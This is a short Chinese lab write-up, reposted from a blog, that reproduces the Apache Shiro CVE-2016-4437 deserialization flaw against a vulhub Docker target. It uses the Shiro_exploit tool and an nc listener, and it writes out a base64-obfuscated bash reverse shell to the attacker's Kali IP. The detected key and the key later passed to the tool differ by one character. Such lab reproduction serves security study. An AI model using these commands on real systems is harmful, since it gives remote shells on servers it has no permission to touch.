本文章使用Shiro_exploit此工具复现,靶机环境为vulhub
项目地址:
https://github.com/insightglacier/Shiro_exploit
https://github.com/vulhub/vulhub
靶机 ip:192.168.171.10
Kali ip:192.168.171.21
进入vulnhub的 shiro/CVE-2016-4437
目录,输入 docker-compose up -d
环境就搭建好了。然后输入 docker ps
就看到ip和端口了。
浏览器访问正常:
执行命令:
python .\shiro_exploit.py -u http://192.168.171.10:8080
发现vulnerable:True证明存在漏洞,后面是Shiro Key:
PH+bIxk5D2deZiIxcaaaA==
Kali监听本地端口
nc -lvvp 1234
将反弹shell的bash命令base64编码:
bash -i >& /dev/tcp/192.168.171.21/1234 0>&1
==>
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4yMS8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i}
运行脚本执行命令:
python shiro_exploit.py -u http://192.168.171.10:8080 -t 3 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4yMS8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i}" -k "kPH+bIxk5D2deZiIxcaaaA=="
可以看到shell反弹成功:
版权说明 : 本文为转载文章, 版权归原作者所有 版权申明
原文链接 : https://blog.csdn.net/weixin_49125123/article/details/125494888
内容来源于网络,如有侵权,请联系作者删除!